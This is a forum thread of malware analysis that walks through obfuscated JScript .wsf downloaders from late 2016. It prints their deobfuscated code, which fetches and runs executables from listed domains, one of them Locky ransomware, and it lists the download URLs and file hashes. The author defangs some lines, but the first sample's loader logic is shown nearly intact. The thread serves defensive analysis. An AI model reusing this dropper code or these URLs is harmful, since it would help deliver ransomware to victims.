Malware Analysis 5 samples - download the real obfuscated Jscript code used to download 2 payloads- Jan,13 2017

[DardiM]

Edited :

From Jan,13 2017
- added Item-Delivery-Details-00000629997.doc.wsf&
- Undelivered-Package-00780518.doc.wsf

https://malwaretips.com/threads/5-s...oad-2-payloads-jan-13-2017.66635/#post-587460
https://malwaretips.com/threads/5-s...oad-2-payloads-jan-13-2017.66635/#post-587738
​

- added at the end of this thread : Delivery-Details.doc.wsf from 20-12-16 : same name, small differences, and domains/ URLS updated.

https://malwaretips.com/threads/del...sed-to-download-2-payloads.66635/#post-578589​

- added Undelivered-Parcel-ID-0000525244.doc.wsf from 03-01-2016

https://malwaretips.com/threads/3-s...-payloads-updated-03012016.66635/#post-583585​

---------------------------------------------------------------------------
​

From https://malwaretips.com/threads/16-12-16-7.66632/
Thanks to @silversurfer
Delivery-Details.wsf - 5/54

Why this sample ?

Small first script : that download an obfuscated code that download the payloads

As often, I have modified some parts of the code to avoid copy-paste => save => infection

1) What it looks like :

What we can see when editing with notepad++ :

<job><script language=JScript>var y = "Msxml2.XMLHTTP"; var u = "rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy"; var x = new Array("aventurarealestatedirectory.com","capsynch.com","ocentsinus.com","ems-informatique.fr","www.apogeoform.net"); var w = "http ://"; for (var i=0; i<5; i++) { var r = "a"; var g = "1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb"; try { var t = x[ i ]; var s = "counter"; var z = new ActiveXObject(y); z.open("GET", w + t + "/" + s + "/?" + r + "=" + g + "&i=" + u, false); z.send(); if (z.status == 200) { z = z.responseText.split("~"); eval(z.join(r)); break; }; } catch(e) { }; };</script></job>

After some formatting :

<job>
    <script language=JScript>
        var y = "Msxml2.XMLHTTP";
        var u = "rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy";
        var x = new Array("aventurarealestatedirectory.com", "capsynch.com", "ocentsinus.com", "ems-informatique.fr", "www.apogeoform.net");
        var w = "http ://";
        for (var i = 0; i < 5; i++) {
            var r = "a";
            var g = "1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb";
            try {
                var t = x[ i ];
                var s = "counter";
                var z = new ActiveXObject(y);
                z.open("GET", w + t + "/" + s + "/?" + r + "=" + g + "&i=" + u, false);
                z.send();
                if (z.status == 200) {
                    z = z.responseText.split("~");
                    eval(z.join(r));
                    break;
                };
            } catch (e) {};
        };
    </script>
</job>

It is very easy to understand the content :


Several vars are created with important parts :

var y = "Msxml2.XMLHTTP";​

=> string used to create later the http object​

var u = "rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy";​

=> string used as a value for the parameter "i" of the future complete built URLs​

var x = new Array(

"aventurarealestatedirectory.com",
"capsynch.com",
"ocentsinus.com",
"ems-informatique.fr",
"www .apogeoform.net"​

);

=> An array of domains (will be used to build the URLs)
​

var w = "http://";

=> first part of future URLs
​

for (var i = 0; i < 5; i++) {

​

=> A loop is done from 0 to 4 max : stops as soon as a working URL built in the loop works.​

var r = "a";

=> used later, on the join function (each part will be join adding a "a")
=> also used as a parameter in the URLs​

var z = new ActiveXObject;​

=> z = new ActiveXObject("Msxml2.XMLHTTP")

=> creates a http object, to make the request

​

var g = "1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb";

=> used as value for the parameter "a" in the future URLs

​

try {

var t = x[ i ];

=> i : current index of the loop

=> t = one of the domains

index i : 0 => "aventurarealestatedirectory.com",
index i : 1 => "capsynch.com",
index i : 2 => "ocentsinus.com",
index i : 3 => "ems-informatique.fr",
index i : 4 => "www .apogeoform.net"
​

var s = "counter";

=> another part of future URLs

​

var z = new ActiveXObject;

=> new ActiveXObject("Msxml2.XMLHTTP");

=> creates the http object, will be used to make the requests

​

z.open("GET", w + t + "/" + s + "/?" + r + "=" + g + "&i=" + u, false);

=> opens a connection with the current URL
=> Example with index i : 0 :

"http://aventurarealestatedirectory.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy"
​

z.send();

=> sends the request to the current URL

​

if (z.status == 200) {

=> test the status value of the request
=> 200 means a success

​

z = z.responseText.split("~");

=> Here, the script use the responseText and not the responseBody we used to see in other analysis.
=> the data received are means to be text ! And not binary (for example a payload exe / dll file)

The .split("~") function split the string received in several parts, using the "~" as separator (this char is lost).
The http object is then overwritten by the array of string resulting of the split function:

Example :

var example_string = "test~lalala~omg~lol" ;

=> var example_array = example_string.split("~");

=> example_array: [ "test", "lalala", "omg", "lol"]​

​

eval(z.join(r));

=> here : z.join(r) with r = "a" (see above parts where the var r was created)

=> this function joins the different parts of the array of string, using r as separator (the content of r !)

Example :

example_array :"test" "lalala" "omg" "lol"

=> new_string = example_array.join("a")

=> new_string : "testalalalaaomgalol"​

​

The eval function => evaluate the string => runs its content

​

break;

=> quits the loop, because a working URL was found​

};​

} catch (e) {};​

2) eval(z.join(r)) : what is the content of the string that is evaluated :

After some changed :
\" (for the interpreter) replace by "

var a = ""; a += 'var ad="1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb'; a += '"; var '; a += 'ld=0; v'; a += 'ar cq='; a += 'String.f'; a += 'romChar'; a += 'Code(34);'; a += ' var cs'; a += '=String'; a += '.fromCha'; a += 'rCode'; a += '(92); v'; a += 'ar ll=['; a += '"oytunid'; a += 'il.com","'; a += 'ems-inf'; a += 'ormatique.'; a += 'fr","www'; a += '.linguae'; a += 'world.it"'; a += ',"www'; a += '.ibla'; a += 'soni.c'; a += 'om","'; a += 'capsync'; a += 'h.com"]; '; a += 'var ws=WSc'; a += 'ript.Cr'; a += 'eateObje'; a += 'ct("WS'; a += 'cript'; a += '.Shel'; a += 'l"); v'; a += 'ar fn='; a += 'ws.Expan'; a += 'dEnvironme'; a += 'ntStrings('; a += '"%TEM'; a += 'P%")+cs+"'; a += 'a"; var x'; a += 'o=WScript.'; a += 'CreateOb'; a += 'ject("Msxm'; a += 'l2.XM'; a += 'LHTTP"); '; a += 'var xa'; a += '=WScrip'; a += 't.Cre'; a += 'ateObjec'; a += 't("ADODB.S'; a += 'tream_")'; a += '; var'; a += ' fo=W'; a += 'Script.C'; a += 'reateObje'; a += 'ct("Scr'; a += 'ipting.F'; a += 'ileSy'; a += 'stemObj'; a += 'ect"); if'; a += ' (!fo.Fi'; a += 'leExists(f'; a += 'n+".txt'; a += '")) { v'; a += 'ar fp='; a += 'fo.CreateT'; a += 'extFile'; a += '(fn+".tx'; a += 't",true'; a += '); fp'; a += '.WriteLi'; a += 'ne("");'; a += ' fp.Clo'; a += 'se();'; a += ' for('; a += 'var n='; a += '1;n<='; a += '2;n++) { '; a += 'for(var i'; a += '=ld;i<'; a += 'll.length;'; a += 'i++) '; a += '{ var dn=0'; a += '; try {'; a += ' xo.op'; a += 'en("G'; a += 'ET","ht'; a += 'tp ://"+l'; a += 'l[i]+"/co'; a += 'unter/?a="'; a += '+ad+"&r='; a += '"+i+n, f'; a += 'alse); xo'; a += '.send'; a += '(); i'; a += 'f(xo.sta'; a += 'tus=='; a += '200) {'; a += ' xa.ope'; a += 'n(); xa.ty'; a += 'pe=1;'; a += ' xa.writ'; a += 'e(xo.'; a += 'responseBo'; a += 'dy); if'; a += '(xa.size'; a += '>1000) { d'; a += 'n=1; '; a += 'xa.saveToF'; a += 'ile(fn+'; a += 'n+".ex'; a += 'e",2); try'; a += '{ws.R'; a += 'un(fn+n+'; a += '".exe'; a += '",1,0'; a += ');}ca'; a += 'tch(e'; a += 'r){}; }'; a += '; xa.close'; a += '(); };'; a += ' if(dn==1'; a += '){ld=i;bre'; a += 'ak;}; '; a += '} catch('; a += 'er){}; '; a += '}; }; '; a += '};'; eval(a);

We can see in this part that :

var a = "";

=> a var a is created, as an empty string

and then different parts are added to this var a, and at the end :

eval(a);

=> the content of this string a is evaluated => run

This is the a string converted in its code, with some formatting I made to be more readable code :

var ad = "1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb";

=> value for parameter "a=" of the future built URLs​

var ld = 0;

=> will be be used to initialize a loop index
​

var cq = String.fromCharCode(34);

=> "​

var cs = String.fromCharCode(92);

=> \
​

var ll = [

"oytunidil.com",
"ems-informatique.fr",
"www .linguaeworld.it",
"www .iblasoni.com",
"capsynch.com"​

];

=> array of domains : used to build the URLs for the http requests​

var ws = WScript.CreateObject("WScript.Shell");

=> Shell object to use the run function (at the end)
​

var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";

=> %TEMP%\a
=> spoil : the path\name for the payloads, without the exe extension (will be add later, with a number)​

var xo = WScript.CreateObject("Msxml2.XMLHTTP");

=> creates the http object​

var xa = WScript.CreateObject("ADODB.Stream");

=> creates the ADO stream object to manipulate the data received from future request​

var fo = WScript.CreateObject("Scripting.FileSystemObject");

=> creates a file system object : to manipulate files / folders​

if (!fo.FileExists(fn + ".txt")) {

=> checks if an a.txt file exist in %TEMP%\ folder : clue to know if the payload has already been downloaded​

var fp = fo.CreateTextFile(fn + ".txt", true);

=> if not : creates the a.txt file

Example : : C:\Users\DardiM\AppData\Local\Temp\a.txt
​

fp.WriteLine("");

=> writes an empty line inside

​

fp.Close();

=> closes the file

​

for (var n = 1; n <= 2; n++) {

=> first Loop to find a working URL :

=> n : second digit for parameter r=
=> value :1 or 2 : first or second payload to download

​

for (var i = ld; i < ll.length; i++) {

=> second Loop to find a working URL :

=> i : index of domain in the array ll and first digit for the the parameter r=
=> value : 0 to 4 (5 domains on the array)

Remember that :

var ll = [
"oytunidil.com",
"ems-informatique.fr",
"www .linguaeworld.it",
"www .iblasoni.com",
"capsynch.com"​

];​

​

var dn = 0;

=> dn : 1 if a working URL (taking into account the parameters) has be found​

​

try {

xo.open("GET", "http ://" + ll[ i ] + "/counter/?a=" + ad + "&r=" + i + n, false);

=> tries the current URL :

=> if a working index i is found, the next loop will be with the same value for i (the var dn is used as flag)

=> then the same domain from the array will be used, but the paramete r for the URL built will change because of the index n value (n= 1 for the first file, and 2 for the second)

​

Example :

- index : i : 0 : first domain used from the array : oytunidil.com

- index n : 1 : first file => a1.exe
- index n : 2 : second file => a2.exe​

​

=> then : r=01

​

and :

​

"http ://oytunidil.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=01"​

​

Remember that :

var ll = [

"oytunidil.com",
"ems-informatique.fr",
"www .linguaeworld.it",
"www .iblasoni.com",
"capsynch.com"​

];

​

xo.send();

=> sends the request

​

if (xo.status == 200) {

=> if http request ok

​

xa.open();

=> open the stream object

​

xa.type = 1;

=> 1 : data treated as binary
​

xa.write(xo.responseBody);

=> data received put in the stream​

​

if (xa.size > 1000) {

​

=> is the size > 1000 ?

​

dn = 1;

=> it means that a valid payload has been found
=> dn is a flag to make the script remembers

​

xa.saveToFile(fn + n + ".exe", 2);

=> saved the data received in the path "%TMP%\a" + n + ".exe"
=> n : 1 or 2 : depends of the loop that worked

=> 2 : create or overwrite if exist

Example : %TMP%\a1.exe fot the first payload

=> C:\Users\DardiM\AppData\Local\Temp\a1.exe​

​

try {

ws.Run(fn + n + ".exe", 1, 0);

=> uses the Shell object Run function (see above parts)
=> runs the payload
​

} catch (er) { };​

};
xa.close();

=> closes the stream object​

};
if (dn == 1) {

=> if dn == 1
=> that means a 'good' payload has been found (valid size)
(a1.exe first, a2.exe in second, depending of n value of first loop)

ld = i;

=> forces the index i to stay the current index that worked

​

break;

=> quits the current loop (with i as index)
=> if n = 2, that means the payload a2.exe has also been downloaded : end of the loops​

};​

} catch (er) { };​

};​

};​

};

About the two loops :

for (var n = 1; n <= 2; n++) {

for (var i = ld; i < ll.length; i++) {
...
}​

...
}

n: 1 => first payload (a1.exe)
n: 2 => second payload (a2.exe)

For each value of n : the index i is used to built a entire URL (with parameters)

the parameter r= is used with 2 digits:

first digit : index i used to retrieve the small url part from the array : from 0 to 4
second digit : n : used to differentiate the two payloads needed a1.exe and a2.exe

=> Therefore, each URLs built has a parameter r=in (replace i and n by their values)

​

=> 01 11 21 31 41 (first loop with n =1 and i : 0 to 4 max)
=> 02 12 22 32 42 (second loop with n = 2 and i : 0 to 4 max)

index i : 0 to 4 max because it will stop at the i where the first URL that worked

​

=> when a working index i is find (for the first payload), it will be used to find the second payload => only the index n will change (1 for the first payload, 2 for the second)

The two payloads are downloaded from same URLS but only with a new r= parameter.

​

=> if the first payload has been succesfully downloaded from :

"http ://ems-informatique.fr/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=11"​

Then it tries to download the second payload with r=12 from the main principal URL​

"http ://ems-informatique.fr/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=12"​

3) Conlusion :

URLs to download the JScript code :

hxxp://aventurarealestatedirectory.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy

hxxp://capsynch.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy

hxxp://ocentsinus.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy

hxxp://ems-informatique.fr/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy

hxxp://www .apogeoform.net/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&i=rXGd85Su_z7vYKkDD9Z-eYS94ovu3Mj_fIrO1Yj1Gc9e4_l5piUOzQwOZQOZamHTjZ_JHeiXcEgPXhBHdzBy​

URLs to download the Payloads :

a1.exe :

"http ://oytunidil.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=01"
"http ://ems-informatique.fr/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=11"
"http ://www .linguaeworld.it/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=21"
"http ://www .iblasoni.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=31"
"http ://capsynch.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=41"

​

a2.exe :

"http ://oytunidil.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=02"
"http ://ems-informatique.fr/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=12"
"http ://www .linguaeworld.it/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=22"
"http ://www .iblasoni.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=32"
"http ://capsynch.com/counter/?a=1MNnQoRsx8zgegSRawFrEYBJiAxgS6A4Xb&r=42"​

Payload :

a1.exe : Trojan-Ransom.Win32.Locky.wsq

17/56
Antivirus scan for eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2 at 2016-12-16 23:58:53 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...a6a1cd6e6b95f0b9f935649aac2?environmentId=100

​

a2.exe : AQVM20.1.0000.Malware

6/56
Antivirus scan for 14bd0238bd1d9d7415a1ed355a6ab0b125a2e69574323bc5f6cc9b8a6e1a1c98 at 2016-12-17 00:07:41 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...69574323bc5f6cc9b8a6e1a1c98?environmentId=100​

 

[Wave]

Great work! Thanks for sharing!

 

[DardiM]

Great work! Thanks for sharing!

Thanks
Not a very long or complex obfuscation, but interesting method : the real "bad" Jscript code received by http request and directly evaluated

 

[Svoll]

It is very easy to understand the content :

Thank you my penguin friend for making this so much clearer for me to understand..... BIG HUGS!

Very clear explanation once I read the entire post instead of the codes. +10 for you.

 

[DardiM]

Thank you my penguin friend for making this so much clearer for me to understand..... BIG HUGS!

Very clear explanation once I read the entire post instead of the codes. +10 for you.

Thanks
Big hug to you, too !
I just edited my first post to make an explanation of the two loops (one inside a second)

 

[Svoll]

I noticed after I send you the PM, nonetheless, those edits really help me understand the entire code behind this .WSF

I felt silly, I should have understood it soon if i read the entire Var and Loops, thank you for pointing that out and editing it...

 

[DardiM]

I noticed after I send you the PM, nonetheless, those edits really help me understand the entire code behind this .WSF

I felt silly, I should have understood it soon if i read the entire Var and Loops, thank you for pointing that out and editing it...

My 'problem' is that I often edit a post, even several hours after it has been posted, because each time I read what I wrote, I find parts that can be not very clear or be improved

I will edit another times, I have retrieved the two payloads, will launch online analysis and put the links.

 

[Wave]

My 'problem' is that I often edit a post, even several hours after it has been posted, because each time I read what I wrote, I find parts that can be not very clear or be improved .

You don't need to worry about it, all your posts are great!

 

[DardiM]

You don't need to worry about it, all your posts are great!

I think now I will not modify more
(2:32 pm)

Tomorrow, I will post a very short analysis : the smaller script-based sample (with obfuscation ) I have ever seen

 

[Svoll]

I think now I will not modify more
(2:32 pm)

Tomorrow, I will post a very short analysis : the smaller script-based sample (with obfuscation ) I have ever seen

I don't know what to say after reading your new edits. I can practically write one myself now, LoL. Its so transparent, I can see the light my friend, I can see the light of wisdom you have bestow upon me and open my eyes.

MODS: Is there a way to + over 9000 on a post?

 

[DardiM]

I don't know what to say after reading your new edits. I can practically write one myself now, LoL. Its so transparent, I can see the light my friend, I can see the light of wisdom you have bestow upon me and open my eyes.

MODS: Is there a way to + over 9000 on a post?

LOL ! => <3

 

[tim one]

Very nice and clear analysis! Big work!
Thanks for sharing @DardiM

 

[DardiM]

The aim of this present post is mainly the conclusion, see the first post for explanations about the functions

From https://malwaretips.com/threads/20-12-16-10.66756/
Thanks to @silversurfer

Delivery-Details.doc.wsf

A similar sample : same method of downloading the text and then evaluate the string, to built the real part :

=> download 2 payloads.

https://www.reverse.it/sample/c05a0...e4a8749127369b53278ade505ea?environmentId=100
Antivirus scan for c05a083c524abc9201cd20d6e18dd7c1de5eae4a8749127369b53278ade505ea at 2016-12-20 16:12:54 UTC - VirusTotal​

1) Main Code :

<job>
    <script language=JScript>
        var m = "binging";
        var g = "/counter/?a=";
        var x = new Array("www.linguaeworld.it", "oytunidil.com", "med-lex.com", "offie.nl", "mercadoatlantico.com.br");

        function yay(z) {
            z = z.join(r);
           // eval(z); => put in comment to avoid copy-paste => run => infection
        };
        for (var i = 0; i < 5; i++) {
            var r = "a";
            try {
                g += "18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&m=" + m + "&i=";
                var z = new ActiveXObject("Msxml2.XMLHTTP");
                z.open("GET", "http://" + x[i] + g + "LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU", false);
                z.send();
                if (z.status == 200) {
                    yay(z.responseText.split(m));
                    break;
                };
            } catch (e) {};
        };
    </script>
</job>

Previous sample :

if (z.status == 200) {

z = z.responseText.split("~");
eval(z.join(r));
break;​

};​

This sample : if the request has a status = OK

if (z.status == 200) {

yay(z.responseText.split(m));

=> call a function that do :

z = z.responseText.split("~");
and eval(z.join(r));
​

break;​

};​

Not a big modification

2) Text download :

  vbingingr binging = ""; binging += 'vbingingr binging'; binging += 'd="18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX";'; binging += ' vbingingr ld=0;'; binging += ' vbingingr cs=St'; binging += 'ring.f'; binging += 'romChbingingr'; binging += 'Code(92); '; binging += 'vbingingr l'; binging += 'l=["chbingingitbinging'; binging += 'nybingingimpex'; binging += '.org","'; binging += 'www.pegbingingmo'; binging += 'ntsbinging.ro",'; binging += '"inst'; binging += 'binginglbingingciondebinging'; binging += 'irespli'; binging += 't.com","m'; binging += 'ercbingingdo'; binging += 'bingingtlbingingn'; binging += 'tico.'; binging += 'com.br","'; binging += 'offie.n'; binging += 'l"]; vbingingr '; binging += 'ws=WSc'; binging += 'ript.Cr'; binging += 'ebingingteObjec'; binging += 't("WS'; binging += 'cript.'; binging += 'Shell")'; binging += '; vbingingr fn=w'; binging += 's.ExpbingingndEn'; binging += 'vironme'; binging += 'ntString'; binging += 's("%TEMP'; binging += '%")+cs+"'; binging += 'binging"; vbinging'; binging += 'r xo=WScri'; binging += 'pt.CrebingingteO'; binging += 'bject("Msx'; binging += 'ml2.XMLH'; binging += 'TTP");'; binging += ' vbingingr xbinging='; binging += 'WScri'; binging += 'pt.Cre'; binging += 'bingingteOb'; binging += 'ject("'; binging += 'ADODB.St'; binging += 'rebingingm"); '; binging += 'vbingingr fo='; binging += 'WScrip'; binging += 't.Crebinging'; binging += 'teObject('; binging += '"Scri'; binging += 'pting.'; binging += 'FileSystem'; binging += 'Object"); '; binging += 'if (!fo.'; binging += 'FileEx'; binging += 'ists(fn+'; binging += '".txt"'; binging += ')) { vbinging'; binging += 'r fp=f'; binging += 'o.Crebinging'; binging += 'teTex'; binging += 'tFile(f'; binging += 'n+".txt",'; binging += 'true);'; binging += ' fp.WriteL'; binging += 'ine("");'; binging += ' fp.Close'; binging += '(); for('; binging += 'vbingingr n=1'; binging += ';n<=2;'; binging += 'n++) { fo'; binging += 'r(vbingingr i=l'; binging += 'd;i<ll.l'; binging += 'ength;'; binging += 'i++) { vbingingr'; binging += ' dn=0; try'; binging += ' { xo.o'; binging += 'pen("G'; binging += 'ET","http:'; binging += '//"+ll'; binging += '[i]+"/c'; binging += 'ounter'; binging += '/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEbinginggXXjZjJHeiXcM6L36bV6MdACTU&binging="'; binging += '+bingingd+"&r="+'; binging += 'i+n, f'; binging += 'binginglse);'; binging += ' xo.se'; binging += 'nd(); if'; binging += '(xo.stbinging'; binging += 'tus=='; binging += '200) {'; binging += ' xbinging.open()'; binging += '; xbinging.typ'; binging += 'e=1; xbinging.wr'; binging += 'ite(xo.r'; binging += 'esponseBod'; binging += 'y); if(xbinging.'; binging += 'size>10'; binging += '000) { dn'; binging += '=1; xbinging.'; binging += 'sbingingveTo'; binging += 'File(fn+n+'; binging += '".exe"'; binging += ',2); t'; binging += 'ry{ws'; binging += '.Run(fn'; binging += '+n+".ex'; binging += 'e",1,0)'; binging += ';}cbingingtc'; binging += 'h(er)'; binging += '{}; }; '; binging += 'xbinging.clo'; binging += 'se(); };'; binging += ' if(dn'; binging += '==1){ld=i'; binging += ';brebingingk'; binging += ';}; } c'; binging += 'bingingtch(er){'; binging += '}; }; '; binging += '}; };'; evbingingl(binging);};};

3) Code that is run After binging => a :

var a = "";
        a += 'var a';
        a += 'd="18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX";';
        a += ' var ld=0;';
        a += ' var cs=St';
        a += 'ring.f';
        a += 'romChar';
        a += 'Code(92); ';
        a += 'var l';
        a += 'l=["chaita';
        a += 'nyaimpex';
        a += '.org","';
        a += 'www.pegamo';
        a += 'ntsa.ro",';
        a += '"inst';
        a += 'alaciondea';
        a += 'irespli';
        a += 't.com","m';
        a += 'ercado';
        a += 'atlan';
        a += 'tico.';
        a += 'com.br","';
        a += 'offie.n';
        a += 'l"]; var ';
        a += 'ws=WSc';
        a += 'ript.Cr';
        a += 'eateObjec';
        a += 't("WS';
        a += 'cript.';
        a += 'Shell")';
        a += '; var fn=w';
        a += 's.ExpandEn';
        a += 'vironme';
        a += 'ntString';
        a += 's("%TEMP';
        a += '%")+cs+"';
        a += 'a"; va';
        a += 'r xo=WScri';
        a += 'pt.CreateO';
        a += 'bject("Msx';
        a += 'ml2.XMLH';
        a += 'TTP");';
        a += ' var xa=';
        a += 'WScri';
        a += 'pt.Cre';
        a += 'ateOb';
        a += 'ject("';
        a += 'ADODB.St';
        a += 'ream"); ';
        a += 'var fo=';
        a += 'WScrip';
        a += 't.Crea';
        a += 'teObject(';
        a += '"Scri';
        a += 'pting.';
        a += 'FileSystem';
        a += 'Object"); ';
        a += 'if (!fo.';
        a += 'FileEx';
        a += 'ists(fn+';
        a += '".txt"';
        a += ')) { va';
        a += 'r fp=f';
        a += 'o.Crea';
        a += 'teTex';
        a += 'tFile(f';
        a += 'n+".txt",';
        a += 'true);';
        a += ' fp.WriteL';
        a += 'ine("");';
        a += ' fp.Close';
        a += '(); for(';
        a += 'var n=1';
        a += ';n<=2;';
        a += 'n++) { fo';
        a += 'r(var i=l';
        a += 'd;i<ll.l';
        a += 'ength;';
        a += 'i++) { var';
        a += ' dn=0; try';
        a += ' { xo.o';
        a += 'pen("G';
        a += 'ET","http:';
        a += '//"+ll';
        a += '[i]+"/c';
        a += 'ounter';
        a += '/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a="';
        a += '+ad+"&r="+';
        a += 'i+n, f';
        a += 'alse);';
        a += ' xo.se';
        a += 'nd(); if';
        a += '(xo.sta';
        a += 'tus==';
        a += '200) {';
        a += ' xa.open()';
        a += '; xa.typ';
        a += 'e=1; xa.wr';
        a += 'ite(xo.r';
        a += 'esponseBod';
        a += 'y); if(xa.';
        a += 'size>10';
        a += '000) { dn';
        a += '=1; xa.';
        a += 'saveTo';
        a += 'File(fn+n+';
        a += '".exe"';
        a += ',2); t';
        a += 'ry{ws';
        a += '.Run(fn';
        a += '+n+".ex';
        a += 'e",1,0)';
        a += ';}catc';
        a += 'h(er)';
        a += '{}; }; ';
        a += 'xa.clo';
        a += 'se(); };';
        a += ' if(dn';
        a += '==1){ld=i';
        a += ';break';
        a += ';}; } c';
        a += 'atch(er){';
        a += '}; }; ';
        a += '}; };';
        //eval(a); => put in comment to avoid copy-paste => run => infection

4) Real part built :

var ad = "18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX";
var ld = 0;
var cs = String.fromCharCode(92);
var ll = ["chaitanyaimpex.org", "www.pegamontsa.ro", "instalaciondeairesplit.com", "mercadoatlantico.com.br", "offie.nl"];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var xo = WScript.CreateObject("Msxml2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var fo = WScript.CreateObject("Scripting.FileSystemObject");
if (!fo.FileExists(fn + ".txt")) {
    var fp = fo.CreateTextFile(fn + ".txt", true);
    fp.WriteLine("");
    fp.Close();
    for (var n = 1; n <= 2; n++) {
        for (var i = ld; i < ll.length; i++) {
            var dn = 0;
            try {
                xo.open("GET", "http://" + ll[i] + "/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=" + ad + "&r=" + i + n, false);
                xo.send();
                if (xo.status == 200) {
                    xa.open();
                    xa.type = 1;
                    xa.write(xo.responseBody);
                    if (xa.size > 10000) {
                        dn = 1;
                        xa.saveToFile(fn + n + ".exe", 2);
                        try {
                            // ws.Run(fn + n + ".exe", 1, 0); => put in comment to avoid copy-paste => run => infection
                        } catch (er) {};
                    };
                    xa.close();
                };
                if (dn == 1) {
                    ld = i;
                    break;
                };
            } catch (er) {};
        };
    };
};

5) Conclusion :

Only small differences on the first script in comparison with the previous sample.

The part built to download the two payloads are very similar to the previous version seen (first post) :
=>the main differences are the domains and URLs used (parameters, etc)

URLs to download the JScript code :

Domains :

www .linguaeworld.it
oytunidil.com
med-lex.com
offie.nl
mercadoatlantico.com.br​

http://domain/counter/?a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&m=binging&i=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&m=binging&i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU​

URLs to download the Payloads :

Domains :

chaitanyaimpex.org
www .pegamontsa.ro
instalaciondeairesplit.com
mercadoatlantico.com.br
offie.nl​

a1.exe :

http://domaine1/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=01
http://domaine2/counter/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=11
http://domaine3/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=21
